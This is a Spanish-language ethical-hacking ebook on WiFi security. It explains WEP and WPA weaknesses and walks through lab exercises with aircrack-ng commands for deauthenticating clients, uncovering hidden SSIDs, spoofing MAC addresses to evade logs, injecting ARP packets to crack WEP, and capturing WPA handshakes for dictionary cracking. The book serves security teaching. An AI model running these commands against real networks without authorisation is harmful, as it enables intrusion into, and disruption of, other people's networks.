0% encontró este documento útil (0 votos)
320 vistas29 páginas

Guia Wireless Hacking

Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
320 vistas29 páginas

Guia Wireless Hacking

Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

WIRELESS HACKING

Guía introductoria al hacking de redes inalámbricas

Por:
Karina Astudillo B.
[Link]
Todos los Derechos Reservados © Karina Astudillo B.
Edición revisada y actualizada, 2021.
Nota: Todos los derechos reservados. Esta publicación no puede ser reproducida total
ni parcialmente, ni registrada o transmitida por un sistema de recuperación de información o
cualquier otro medio, sea este electrónico, mecánico, fotoquímico, magnético, electrónico,
por fotocopia o cualquier otro, sin permiso por escrito previo de la editorial y el titular de los
derechos, excepto en el caso de citas breves incorporadas en artículos críticos o revisiones.
Todas las marcas registradas son propiedad de sus respectivos propietarios. En lugar
de poner un símbolo de marca después de cada ocurrencia de un nombre de marca
registrada, usamos nombres en forma editorial únicamente, y al beneficio del propietario de
la marca, sin intención de infracción de la marca registrada. Cuando estas designaciones
aparecen en este libro, se imprimen con mayúsculas iniciales y/o con letra cursiva.
La información publicada en este libro está basada en artículos y libros publicados y
en la experiencia de su autora. Su único propósito es educar a los lectores en la ejecución de
pruebas de intrusión o hacking éticos profesionales. No nos responsabilizamos por efectos,
resultados o acciones que otras personas obtengan de lo que aquí se ha comentado o de los
resultados e información que se proveen en este libro o sus enlaces.
Se ha realizado un esfuerzo en la preparación de este libro para garantizar la exactitud
de la información presentada. Sin embargo, la información contenida en este libro se vende
sin garantía, ya sea expresa o implícita. Ni la autora, ni la editorial, sus concesionarios o
distribuidores serán responsables de los daños causados o presuntamente causados directa o
indirectamente por el uso de la información provista en este libro.
Tabla de Contenido

El entorno WiFi ....................................................................................................................................... 4

¿Qué son las tecnologías WiFi?............................................................................................................... 4

El protocolo WEP .................................................................................................................................... 4

Los protocolos WPA/WPA2/WPA3 ......................................................................................................... 5

¿En qué consiste el Wardriving? ............................................................................................................. 6

Software para hacking inalámbrico ........................................................................................................ 7

¿Cómo vencer los mecanismos de protección? ...................................................................................... 8

Laboratorios de Hacking Inalámbrico ..................................................................................................... 9

Lab: Mapeando WLANs desde Linux ................................................................................................... 9

¿Qué quiere decir que una WLAN está oculta? ................................................................................ 10

Lab: Mapeando WLANs ocultas desde Linux .................................................................................... 12

Lab: Hackeando WEP con aircrack-ng ............................................................................................... 14

Lab: Hackeando WPA/WPA2 con aircrack-ng ................................................................................... 17

Recursos útiles ...................................................................................................................................... 21

Acerca de la autora ............................................................................................................................... 22

Otros libros de Karina Astudillo ............................................................................................................ 24

¿Deseas convertirte en Hacker Ético, pero no sabes cómo empezar? ................................................. 25

Anexo .................................................................................................................................................... 26

NOTAS Y REFERENCIAS.......................................................................................................................... 28
El entorno WiFi
Las redes inalámbricas - WiFi - son cada vez más populares en las empresas y en los
hogares, debido a que son ideales para proveer movilidad y fácil expansión.

Esto sumado a que las velocidades actuales de las WiFi se equiparan a las de la red
cableada en la capa de acceso, ha hecho que se vuelvan extremadamente populares.

Lamentablemente, junto con su popularidad se han introducido también riesgos


informáticos que vuelven a las mismas vulnerables y objeto apetecido por los
ciberdelincuentes, también llamados crackers (hackers maliciosos).

¿Qué son las tecnologías WiFi?


El término WiFi fue creado en el año 2003 por la agencia de marketing Interbrand a
petición de la organización que en ese entonces se denominaba WECA (Wireless Ethernet
Compatibility Alliance) y que hoy se llama Wi-Fi Alliancei.
Este término se utilizó en primer lugar para referirse de forma particular al estándar
IEEE 802.11bii, pero hoy se lo usa de forma general para denotar a las redes de área local
inalámbricas o también llamadas Wireless LANs (WLANs), todas ellas pertenecientes a la
familia IEEE 802.11.

Las tecnologías WiFi tienen la particularidad de utilizar ondas electromagnéticas para


la comunicación de datos, por lo que no se requieren cables para conectar los dispositivos
finales en red. Esta flexibilidad en la implementación de las WLANs, unido a su bajo costo, es
lo que las ha hecho tan populares en la actualidad.

Para proteger de alguna forma la comunicación entre los clientes inalámbricos


(computadoras, smartphones, tablets, etc.) se han desarrollado protocolos entre los cuales
destacan WEP y WPA/WPA2.

El protocolo WEP
El protocolo WEP surgió a fines de los 90′s como un protocolo para resguardar la
información transmitida en redes inalámbricas. Sin embargo, al poco tiempo de
implementado se encontraron vulnerabilidades graves de seguridad que permitían violar el
protocolo y obtener fácil acceso a las redes inalámbricas que debía “proteger”.

Debido a las fallas de seguridad de WEPiii se diseñó un nuevo protocolo, WPA (WiFi
Protected Access) el cual se encuentra especificado en la actualidad como el estándar WPA2.
Lo que resulta increíble es que a pesar de las falencias conocidas de WEP, aún existen
muchas redes inalámbricas que lo implementan como protocolo para el aseguramiento de
los datos transmitidos.

Los protocolos WPA/WPA2/WPA3


Las siglas WPA vienen del inglés WiFi Protected Access, en español: Acceso Protegido
WiFi. El WPA es un esquema de seguridad utilizado para proteger la transmisión de datos en
redes inalámbricas.

El propósito del desarrollo de WPA fue corregir los errores de seguridad que presenta
WEP. En este sentido WPA incorpora mejoras tanto en la autenticación como en la
encripción. Aunque no se han reportado a la fecha vulnerabilidades a nivel del protocolo,
existen esquemas que permiten bajo ciertas condiciones romper la seguridad de una red
inalámbrica con WPA/[Link] Por ejemplo, a través de la explotación del protocolo TKIP y de
una característica denominada WiFi Protected Setup que se usa para facilitar la autenticación
automática de dispositivos a la red wireless.

Para corregir estos temas y mejorar la seguridad surgió posteriormente la versión 2


de WPA o también llamado WPA2. En WPA2 la encripción se ve reforzada a través de la
incorporación del protocolo de encripción AES - Advanced Encription Standard.

Aun así, si el administrador de la red inalámbrica utiliza un sistema de clave


precompartida (pre-shared key) es factible utilizar un ataque de claves de fuerza bruta,
basado en diccionario, o híbrido sobre la red objetivo. Por supuesto, el éxito de la misión y el
tiempo que tome ejecutar el hack dependerá de la longitud de la clave y de si ésta está o no
basada en criterios de complejidad.

Vale mencionar, además, que recientemente, se han encontrado falencias en el


protocolo WPA2 que lo vuelven vulnerable bajo ciertas condiciones específicasv, por lo que
en enero de 2018 la WiFi Alliance lanzó su sucesor: WPA3. Lamentablemente el lanzamiento
de WPA3 trajo consigo un error que saltó a la palestra en abril de 2019 - hallado por Mathy
Vanhoef y bautizado como “Dragonblood” - y que fue catalogado como “error de diseño”, el
cual permitiría a los crackers robar contraseñas en redes WiFi que implementen este
protocolo.

Posteriormente, en agosto de 2019, el mismo investigador de seguridad Vanhoef en


conjunto con Eyal Ronel, halló dos vulnerabilidades adicionales en WPA3 que permitirían a un
atacante obtener las credenciales de una WiFi mediante fuerza bruta.

Ante estas lamentables noticias la WiFi Alliance aseguró que estas falencias se
corregirían mediante actualizaciones, pero el hecho de que errores de esta magnitud se
hayan escapado al escrutinio previo al lanzamiento de un nuevo protocolo que prometía ser
la solución a los problemas de WPA2 deja entrever que más errores se descubrirán en un
futuro cercano y que, por tanto, nosotros los pentesters e investigadores de seguridad
continuaremos teniendo mucho trabajo ;-)
¿En qué consiste el Wardriving?
El wardriving consiste en la detección y ataque a redes inalámbricas usando
dispositivos móviles, la forma más popular es hacerlo desde un auto con una laptop equipada
con una antena inalámbrica y un software para hacking inalámbrico, como la popular suite
aircrack-ng.

El objetivo es detectar la presencia de redes inalámbricas pertenecientes al cliente e


identificar vulnerabilidades que permitan el ingreso al hacker.

Las antenas amplificadoras de señal pueden construirse utilizando implementos tan


simples como el clásico cilindro metálico de papitas fritas, también llamado “cantenna” - por
la combinación de las palabras inglesas “can” (contenedor) y “antenna” (antena).
Por supuesto, si no somos expertos soldadores siempre podremos recurrir a comprar
antenas amplificadoras profesionales.
Software para hacking inalámbrico
Aunque existen múltiples herramientas para efectuar hacking inalámbrico tanto en
Windows, Mac, Linux y Android, entre ellos destaca sin duda la suite Aircrack-ng
([Link]

La suite Aircrack consiste en un conjunto de herramientas de código abierto que


permiten efectuar tareas como escaneo, mapeo, captura de tramas, inyección de paquetes y
cracking de claves, en redes inalámbricas.

Aunque fue desarrollada inicialmente para Linux está también disponible en otras
plataformas como MacOS y Windows.

Por sus muchas prestaciones, viene usualmente preinstalada en todas las distros
Linux de Seguridad Informática, entre ellas la popular Kali Linux.

Estos son de forma breve los comandos más utilizados de la suite Aircrack-ng:
● airmon-ng: usado para habilitar el modo monitor en un adaptador de red inlámbrico.
● aireplay-ng: se usa para inyectar paquetes en una wlan.
● airodump-ng: sirve para efectuar capturas de paquetes en una wlan.
● aircrack-ng: su propósito es realizar cracking de claves de los protocolos WEP y
WPA/WPA2.

Usaremos esta suite y sus comandos en los laboratorios más adelante, por lo tanto,
vale la pena que el lector le dedique unos minutos a revisar la Wiki del proyecto ubicada en
[Link]
¿Cómo vencer los mecanismos de protección?
Para poder efectuar un hacking ético inalámbrico es necesario recolectar la siguiente
información sobre nuestro objetivo:

● Cuáles son las redes inalámbricas cercanas a nuestra estación de wardriving (SSID).
● Qué mecanismos de encripción y ciphers utilizan las WLANs cercanas (ENC, CIPHER).
● El tipo de autenticación que utilizan dichas WLANs (AUTH).
● En qué canal transmiten información (CH).
● ¿Cuáles son las redes más cercanas a nuestra ubicación? (PWR).vi
● La dirección MAC de los APs que gestionan las WLANs (BSSID).
● Si hay clientes conectados a una WLAN (STATION) y si hay poca o mucha actividad en dicha
red (#Data, #/s).
● La máxima velocidad soportada por el AP (MB).

Nota: las siglas entre paréntesis hacen referencia a los campos respectivos mostrados
en la salida del comando airodump-ng.

Con esta información nos corresponderá decidir qué WLAN o WLANs auditar y qué
tipo de ataque utilizar.

El ataque que efectuemos dependerá de nuestro objetivo en particular, pero en los


siguientes laboratorios nos enfocaremos en ataques a WEP y WPA/WPA2.
Laboratorios de Hacking Inalámbrico

Lab: Mapeando WLANs desde Linux

Recursos:

● Estación hacker: Computador con sistema operativo Linux.


● Software: Suite Aircrack y wireless-tools.
● Hardware: Tarjeta de red inalámbrica compatible con Linux y con la suite
Aircrack-ng.

Pasos que seguir:

1. Abra un terminal e identifique la interfaz de red inalámbrica con el comando


“sudo ifconfig”. En este ejemplo la interfaz WiFi es una tarjeta externa USB
marca Alfa, modelo AWUS051NH e identificada por Linux con el nombre
wlx00c0ca8886ad.
2. Luego, coloque la interfaz en modo monitor. Esto puede hacerse con el
comando iwconfig o con el comando [Link]

Ej:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

3. Bien, ya estamos listos para mapear las redes inalámbricas cercanas. Para ello
haremos un escaneo activo con el comando airodump-ng. Ej: sudo
airodump-ng wlan0 (con mi tarjeta externa sería: sudo airodump-ng
wlx00c0ca8886ad).
4. Como se puede observar ya podemos ver las distintas WLANs y sus
parámetros. Sin embargo, se puede ver en el gráfico adjunto que hay una
WLAN cuyo nombre está oculto (es la que dice “<length: 0>” en el campo
ESSID (Extended Service Set Identifier).
¿Qué quiere decir que una WLAN está oculta?

Cuando configuramos una WLAN en un AP, como administradores tenemos la


potestad de decidir si vamos a publicar la existencia de esta; esto usualmente se
puede hacer muy fácilmente desde la interfaz de administración del AP en la sección
de redes inalámbricas con tan solo activar/desactivar una opción de “visibilidad”.

La siguiente figura muestra cómo se activa/desactiva la opción de visibilidad en un


AP.

Ahora, ¿qué significa esto en términos del estándar 802.11? Pues entre los tipos
de tramas usadas por una red WiFi hay un tipo especial denominado “beacon”.

Un beacon frame contiene información sobre la WLAN como el Service Set


Identifier (SSID) el cual conocemos como “el nombre de la WLAN” y otros parámetros,
estos beacons son transmitidos por el AP de forma periódica de modo que los clientes
inalámbricos puedan asociarse a la WLAN.
Cuando un administrador configura a la WLAN en modo “invisible” lo que ocurre
es que el campo SSID dentro del beacon se envía vacío, por este motivo, el cliente
inalámbrico deberá conocer con antelación el nombre de la WLAN para poder
asociarse a la misma.

En la siguiente gráfica observamos como al escanear WLANs desde Kali Linuxviii


tanto en modo pasivo como activo hay una red de la cual no nos aparece el SSID, por
ende, deducimos que el administrador ha ocultado la red.

Empero, esto es tan sólo un leve contratiempo, en el siguiente laboratorio


veremos cómo podemos mapear una WLAN que tiene su SSID oculto.
Lab: Mapeando WLANs ocultas desde Linux

Recursos:

1. Estación hacker: Computador con sistema operativo Linux (en este lab usamos
Kali).
2. Software: Suite Aircrack y wireless-tools.
3. Hardware: Tarjeta de red inalámbrica compatible con Linux y con la suite
Aircrack-ng.

Pasos que seguir:

1. Primero colocamos nuestra tarjeta WiFi en modo monitor y luego


capturaremos paquetes con airodump-ng.

Ej: airodump-ng wlan0

2. Como se puede ver hay una red abierta (OPEN), pero que está oculta. Esto lo
sabemos porque en lugar del nombre de la WLAN aparece el texto “<length:
0>”.
3. Para conocer el nombre de esta WLAN oculta usaremos un truco sencillo,
haremos que uno de los clientes conectados a dicha red se vuelva a autenticar.
¿Cómo? Pues desautenticándoloix con el comando aireplay-ng.
● Corte la captura con airodump-ng y esta vez vuelva a efectuarla pero
restringiéndola al AP de interés. Para ello necesitaremos la información del
campo BSSID, es decir la dirección MAC del AP víctima y el canal que usa para
la comunicación.

Sintaxis: airodump-ng --channel #canal_del_AP —-bssid MAC_AP_víctima


nombre_adaptador_wifi

Ej: airodump-ng --channel 7 --bssid [Link] wlan0


4. Ahora abra otro terminal y en él ejecute aireplay-ng.

Sintaxis: aireplay-ng -0cantidad_paquetes_deauth -a


dirección_MAC_del_AP_víctima -c dirección_MAC_del_cliente
nombre_adaptador_wifi

Ejemplo: aireplay-ng -020 -a [Link] -c [Link] wlan0

5. Como podemos ver, al efectuar el ataque con aireplay-ng el cliente se vuelve a


autenticar, revelándonos el nombre de la WLAN. En este ejemplo nuestra
WLAN oculta tiene por nombre “ESCONDIDA”.
Lab: Hackeando WEP con aircrack-ng

El protocolo WEP tiene fallas de seguridad que hacen posible vulnerar el protocolo.
Una de las vulnerabilidades que hacen factible violentar WEP es un campo denominado
Vector de Inicialización, IV por sus siglas en inglés. Este campo tiene apenas 24 bits de
longitud y se transmite en texto plano como parte de un mensaje WEP, es decir sin cifrar.

El campo IV es utilizado por el protocolo WEP como parte del proceso de inicialización
de claves del algoritmo de cifrado RC4 para generar un key stream. x Dado que las
combinaciones únicas de IVs diferentes son limitadas (debido al espacio pequeño provisto
por los 24 bits), esto implica que en algún momento los IVs se reutilizarán si hay suficiente
tráfico en la red, provocando también una reutilización del key stream. Esto último sucede
puesto que la clave compartida (preshared key, PSK) no cambia de forma frecuente.

Sin entrar en mayores detalles relativos a criptografía, debido a lo anterior será


posible para un atacante deducir la clave compartida (PSK) a partir de capturar un suficiente
número de IVs. Esto podría hacerse de forma pasiva capturando paquetes durante largas
horas o de forma activa inyectando paquetes en la WLAN para acelerar el proceso de colisión
y esto último es lo que precisamente vamos a hacer en este laboratorio.

Recursos:

● Estación hacker: Computador con sistema operativo Linux (en el ejemplo usamos
Kali).
● Software: Suite Aircrack y wireless-tools.
● Hardware: AP configurado con el protocolo WEP. Tarjeta de red inalámbrica
compatible con Linux y con la suite Aircrack-ng.

Pasos que seguir:

1. Configure su router o punto de acceso inalámbrico con WEP como protocolo de


cifrado y colóquele una nueva clave.
2. Abra una línea de comandos (shell).
3. Baje su interfaz inalámbrica usando el comando ifconfig.

Sintaxis: ifconfig nombre_tarjeta_wifi down


Ej: ifconfig wlan0 down

4. Disfrazaremos ahora la dirección MAC del adaptador inalámbrico, con ayuda del
comando macchanger. La idea es simular el ataque de un hacker que no desea que el
administrador identifique la dirección MAC real de su tarjeta de red si llegase a revisar
los logs del AP/router o si tuviese algún software de monitoreo inalámbrico activo.

Sintaxis: macchanger --mac=DIRECCION_MAC_FALSA nombre_tarjeta_wifi


Ej: macchanger --mac=[Link] wlan0
5. Coloque la interfaz wlan0 en modo monitor usando airmon-ng:

6. Utilice airodump-ng para identificar el nombre de la red inalámbrica (SSID) y el canal


del AP/router víctima. Ej: airodump-ng wlan0mon.
7. Corte la captura anterior con CTRL + C e inicie la nueva captura de paquetes con
airodump-ng, reemplazando los parámetros acordes al AP víctima:

Sintaxis: airodump-ng -c número_del_canal -w nombre_archivo_captura --ivs


nombre_tarjeta_wifi
Ej: airodump-ng --channel 8 --bssid [Link] -w capwep --ivs wlan0mon

8. Mientras se lleva a cabo la captura, abra una segunda ventana de comandos y realice
un ataque deauth con aireplay-ng, para causar que el cliente se vuelva a autenticar
con el AP víctima y provocar que se generen tramas ARP, que luego usaremos para
inyectarlas a la red.

Sintaxis: aireplay-ng -e nombre_red_inalambrica -a mac_ap_victima -c mac_cliente -0


cantidad_mensajes_deauth nombre_tarjeta_wifi
Ej: aireplay-ng -e HACKME_WEP -a [Link] -c [Link] —0 10
wlan0mon

9. Abra una tercera ventana de comandos e inyecte paquetes ARP al AP víctima, para
incrementar el tráfico y capturar los IV’s más rápidamente:

Sintaxis: aireplay-ng --arpreplay -b mac_ap_victima -h mac_cliente


nombre_tarjeta_wifi
Ej: aireplay-ng --arpreplay -b [Link] -h [Link] wlan0mon

10. Ahora tenga mucha paciencia. Hace falta capturar un mínimo de vectores de
inicialización (IV’s) con airodump-ng para poder crackear la clave con aircrack-ng.
Cuando crea haber capturado los IV’s suficientes abra un nuevo shell y ejecute el
comando siguiente. Si los IV’s capturados no bastan, aircrack le dirá en pantalla que
continúe capturando paquetes y pruebe nuevamente después.

Sintaxis: aircrack-ng -0 -n número_bits_psk nombre_archivo_captura


Ej: aircrack-ng -0 -n 64 [Link]

Nota:
● PSK: preshared-key (clave compartida). El número n el cual representa el tamaño de
la clave puede ser 64 (40 bits más 24 bits del IV) o 128 (104 bits más 24 bits del IV).
● No olvide devolver su tarjeta inalámbrica al modo administrado (managed) para
poder conectarse a la WiFi víctima (airmon-ng wlan0 stop).

Lab: Hackeando WPA/WPA2 con aircrack-ng

En este laboratorio realizaremos un ataque de claves basado en diccionario en contra


de una WLAN con WPA/WPA2. Para ello nuestro primer objetivo será capturar un hash válido
durante el proceso de autenticación entre un cliente y el AP (handshake), esto lo lograremos
efectuando un ataque de de-auth en contra del cliente elegido (forzándolo a autenticarse de
nuevo). Una vez obtenido el hash procederemos a efectuar el ataque de cracking de claves.

Recursos:

● Estación hacker: Computador con sistema operativo Linux (en el ejemplo usamos
Kali).
● Software: Suite Aircrack y wireless-tools.
● Hardware: AP configurado con el protocolo WPA/WPA2. Tarjeta de red inalámbrica
compatible con Linux y con la suite Aircrack-ng.
● Archivos: Diccionario de claves incluido con Kali Linux.
● Nota: Para que el ataque tenga éxito, el AP debe tener configurada una clave (PSK)
contenida dentro del diccionario.

Pasos a seguir:

1. Configure el AP/router con protocolo de autenticación WPA/WPA2 de clave


compartida (preshared-key), cree una red inalámbrica y asígnele una clave cualquiera.
Si desconoce cómo realizar el procedimiento de configuración de una red inalámbrica
en un AP/router, por favor refiérase al manual del fabricante incluido con su equipo
de acceso inalámbrico.

2. Si actualmente está conectado a alguna red inalámbrica desconéctese.

3. Abra una ventana de comandos en su estación de trabajo Linux y ejecute el comando


ifconfig. La siguiente figura muestra un posible resultado.
4. Identifique correctamente su adaptador inalámbrico. Es probable que se llame wlan0.

5. Baje el adaptador inalámbrico (ifconfig wlan0 down), colóquelo en modo promiscuo


(iwconfig wlan0 mode monitor) y súbalo nuevamente (ifconfig wlan0 up) como se
muestra en la siguiente imagen.

6. Posteriormente usaremos la herramienta airodump-ng para identificar el SSID y el


número de canal del accesspoint víctima:

airodump-ng wlan0

7. Si el accesspoint/router víctima tiene protección contra propagación de SSID es


probable que no lo detecte con airodump-ng. En ese caso ejecute desde la línea de
comandos la utilidad kismet y siga las instrucciones indicadas en pantalla para agregar
el adaptador wireless.

8. Asegúrese de copiar el BSSID del AP víctima y el número del canal. Corte la captura
anterior de airodump con CTRL + C y realice una nueva captura reemplazando los
datos respectivos en el comando siguiente:

airodump-ng -w captura -c canal_ap --bssid mac_del_ap wlan0

9. Verifique la dirección MAC de un cliente conectado al AP víctima. Mientras


airodump-ng captura paquetes, abra una ventana de comandos adicional y ejecute la
utilidad aireplay-ng:

aireplay-ng -0 10 -a mac_del_ap -c mac_de_un_cliente wlan0


10. El comando aireplay-ng, tal y como se muestra en la figura previa, inyecta
paquetes en la red inalámbrica para provocar que el cliente escogido se
re-autentique. Esto lo hacemos con la finalidad de poder capturar un hash durante el
proceso de autenticación (dicho proceso se denomina WPA Handshake). Ahora es
necesario tener paciencia y esperar hasta captar el hash con airodump-ng. En el
momento en que obtenga el hash, está usted listo para realizar el ataque basado en
diccionario. La siguiente figura muestra el momento en que capturamos el hash. Si los
10 paquetes enviados son insuficientes para de-autenticar al cliente, aumente el
valor.

11. Detenga el comando airodump-ng realizando un CTRL+C. Se debe haber


generado un archivo de captura de paquetes llamado captura-##.cap en el directorio
actual (reemplace ## por el número respectivo).

12. Use la herramienta aircrack-ng para ejecutar el ataque basado en diccionario.


Utilice la ruta a uno de los diccionarios incluidos con Kali o use su propio diccionario.

aircrack-ng -w /pentest/wireless/aircrack-ng/test/[Link] [Link]


13. ¿Fue exitoso el ataque?

14. Si el ataque es infructuoso eso se deberá a que el diccionario utilizado en este


ejemplo no incluye la clave del AP/router. Para efectos de prueba agregue al final del
diccionario (Ej: /pentest/wireless/aircrack-ng/test/[Link]) la clave que colocó
durante la configuración del AP.

15. Repita el ataque con aircrack-ng. ¿Fue exitoso el ataque?

16. En conclusión: un ataque basado en diccionario sólo será exitoso si la clave


colocada por el administrador se encuentra en el diccionario utilizado por el hacker.
Refiérase a los enlaces indicados previamente en esta sección para descargar
diccionarios más grandes de los que vienen incluidos como ejemplos con Kali Linux.

17. Para regresar el adaptador a su estado normal y poder conectarse a redes


inalámbricas, ejecute los siguientes comandos en un terminal:

ifconfig wlan0 down

iwconfig wlan0 mode managed

ifconfig wlan0 up
Recursos útiles

● Portal con mis recomendaciones de antenas para Wardriving y otros tópicos de


hacking: [Link]
● Artículo: SANS Institute. (2016). A Guide to Wardriving and Detecting Wardrivers.
[Link]. Recuperado de
[Link]
● Libro: Pretty, B. (2017). Build an Aircrack Super Cluster:: with Raspberry Pi (1st ed.).
ISBN Canada.
● Hacking inalámbrico desde Windows: Alternativa a airpcap - Emulación de tarjetas
airpcap con Acrylic. (2021). Acrylic WiFi. Recuperado de
[Link]
● Website: [Link]. Recuperado en 2019, de [Link]
● Website: Diccionario online gratuito para cracking de claves en redes WPA/WPA2.
Free online WPA cracker with stats - besside-ng companion. (2021).
[Link]. Recuperado de [Link]
● Website: Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution.
(2021). Recuperado de [Link]
● Curso gratuito sobre el framework de pentesting Metasploit:
[Link]
Acerca de la autora

Karina Astudillo B. es una consultora de sistemas


especializada en seguridad informática, redes y sistemas
UNIX/Linux y es la autora del Bestseller, “Hacking Ético 101 -
Cómo hackear profesionalmente en 21 días o menos!”.

Karina es Ingeniera en Computación, MBA, y cuenta con


certificaciones internacionales como: Certified Ethical Hacker
(CEH), Computer Forensics US, CCNA R&SW, CCNA Security, CCNA
Wireless, Hillstone Certified Security Professional (HCSP), Cisco
Certified Academy Instructor (CCAI), Sun Certified Solaris System Administrator (SCSA), Palo
Alto ASE & PSE Platform F y VmWare VTSP & VSP.

Inició su carrera en el mundo de las redes en el año 1995, gracias a una oportunidad
de trabajo en un proyecto con IBM en su alma máter, la Escuela Superior Politécnica del
Litoral (ESPOL). Desde entonces el mundo de las redes, los sistemas operativos y la
seguridad, la fascinaron al punto de convertirse en su pasión.

Años más tarde, luego de adquirir experiencia trabajando en el área de servicio al


cliente de la corporación transnacional ComWare, fundó Consulting Systems en 1999 en
donde provee servicios de consultoría y capacitación en Hacking Ético, Cómputo Forense y
Ciberseguridad en general.

Paralelamente a la consultoría, Karina siempre ha tenido una pasión innata por


enseñar, gracias a lo cual surgió la oportunidad de vincularse con la docencia como profesora
de la Facultad de Ingeniería en Electricidad y Computación (FIEC) allá por el año 1996.

En la actualidad es instructora del programa Cisco Networking Academy y de los


programas de Maestría en Sistemas de Información (MSIG) y Maestría en Seguridad
Informática Aplicada (MSIA) de FIEC-ESPOL.

Debido a esta experiencia docente consideró incluir como parte de la oferta de su


empresa, programas de preparación en seguridad informática, entre ellos talleres de Hacking
Ético. Al publicar el éxito de estos talleres en su página de Facebook empezó a recibir
solicitudes de estudiantes que se encontraban en ciudades y países diferentes que
preguntaban por los cursos, sólo para desilusionarse cuando se les contestaba que sólo se
dictaban de forma presencial en Ecuador.

Fue entonces cuando nació la idea de escribir libros y elaborar cursos online sobre
Seguridad Informática para poder transmitir – sin límites geográficos - los conocimientos
dictados en los talleres presenciales.

En sus momentos de esparcimiento Karina disfruta leer sobre ciencia ficción, viajar,
compartir con su familia y amigos y escribir sobre ella en tercera persona ;-D
Comuníquese con Karina Astudillo B.
Siéntase libre de consultar a la autora o realizar comentarios sobre el libro en:

Websites:
• [Link]
• [Link]
• [Link]
Email: karina@[Link]
Twitter: [Link]
Facebook: [Link]
Instagram: [Link]
YouTube: [Link]
Otros libros de Karina Astudillo

Encuéntralos en:

[Link]
¿Deseas convertirte en Hacker Ético, pero no sabes cómo
empezar?

¡Regístrate en mi Webinar GRATUITO “7 Pasos Para Ser Un Pentester” y descubre los


pasos que te guiarán para alcanzar tu meta de ser un Hacker Ético Profesional!
Anexo

Cómo realizar con éxito los laboratorios

Para realizar los laboratorios requerimos montar un escenario similar al mostrado en


la figura:

Requisitos de hardware:
• 1 estación hacker con 1 tarjeta de red WiFi
• 1 dispositivo cliente con 1 tarjeta de red WiFi
• 1 router WiFi (AP) que soporte autenticación abierta, control por direcciones
MAC, WEP, WPA/WPA2, WPS y autenticación personal (PSK).

Requisitos de software:
• Para la estación hacker: Kali Linux y Windows 7 o superior
• El cliente inalámbrico puede ser 1 PC con Unix/Linux/Windows/MacOS o 1
dispositivo móvil (smartphone/tablet)
• Drivers para las tarjetas inalámbricas que permitan inyectar paquetes a la red

Podemos instalar Kali Linux en nuestro computador físico o bien en una máquina
virtual usando un hipervisor como VmWare o VirtualBox.

Instalar Kali en nuestra máquina física tiene la ventaja de que podemos usar la tarjeta
inalámbrica que usualmente viene integrada en el equipo para efectuar los laboratorios. La
desventaja es que, si sólo tenemos un computador y ya tenemos otro sistema operativo
instalado como Windows, esto requeriría sobreescribirlo o bien ejecutar un procedimiento
avanzado de instalación (dual-boot) para poder tener dos sistemas operativos en el mismo
equipo físico, procedimiento que podría resultar complicado para los usuarios no expertos.

Si por el contrario decidimos virtualizar Kali Linux en nuestro sistema operativo actual,
el proceso es muy fácil. Básicamente descargar el hipervisor (VmWare o VirtualBox) e
instalarlo, descargar la máquina virtual ya lista para la plataforma elegida desde la página
oficial de Kali y simplemente ejecutarla. La desventaja es que no podremos usar la tarjeta
inalámbrica integrada dentro de la máquina virtual, en este caso deberemos adquirir una
tarjeta inalámbrica externa.

Si el lector decide adquirir una tarjeta inalámbrica externa, verifique que sea
compatible con Kali Linux y que soporte inyección de paquetes y si ya va a invertir, pues
entonces mejor que sea de una vez una tarjeta que incluya una antena amplificadora de
señal de alta potencia.

Si el lector decide virtualizar, se recomienda que el equipo físico tenga como mínimo
8GB de RAM, para que pueda asignarle al menos 4GB de memoria a Kali Linux. De igual forma
es importante que el procesador sea rápido (dual-core mínimo, quad-core recomendado).

¿En dónde conseguimos los instaladores del software requerido?

● Kali por ser Linux es un sistema de código abierto, por ende, se puede descargar
gratuitamente desde [Link]
● Microsoft ofrece máquinas virtuales de sistemas Windows 7, 8 y 10 con licencia de 90
días para quienes se registren en el programa de desarrolladores. Website:
[Link]
● VmWare tiene un hipervisor gratuito llamado VmWare Player, descargable desde
[Link]
● VirtualBox a su vez es un hipervisor de código abierto y puede descargarse desde
[Link]
NOTAS Y REFERENCIAS
i Wi-Fi Alliance. (2016). Who We Are. Recuperado de

[Link]

ii IEEE. (2016). IEEE 802.11, The Working Group for WLAN Standards.

Recuperado de [Link]
iii Songhe Zhao & Charles A. Shoniregun. (2007).Critical Review of
Unsecured WEP. Services, 2007 IEEE Congress on. DOI:
10.1109/SERVICES.2007.27.
iv Muthu Pavithran. S. (2015). Advanced Attack Against Wireless

Networks Wep, Wpa/Wpa2-Personal And Wpa/Wpa2-Enterprise. International


Journal of Scientific & Technology Research Volume 4, Issue 08.
v Vanhoef, M. (2017, October 30). Key Reinstallation Attacks.

Recuperado en 2018, desde [Link]


vi Un nivel de potencia más alto indica mayor proximidad.
vii Para consultar el manual de un comando en Linux abra un terminal

y ejecute el comando man de la siguiente forma:

man nombre_comando

Ej: man airmon-ng

viii En Kali, a diferencia de otros Linux, no es necesario colocar la


tarjeta en modo monitor para poder efectuar escaneos pasivos y activos.
ix Que me disculpe la RAE, pero no se me ocurre otra palabra mejor en

español para traducir “deauth”.


x “En criptografía, un keystream es un conjunto de caracteres

aleatorios o pseudo-aleatorios que son combinados con un mensaje en texto


plano para producir un mensaje cifrado (el ciphertexto)”. Wikipedia.
(2017). Keystream. Recuperado de
[Link]

También podría gustarte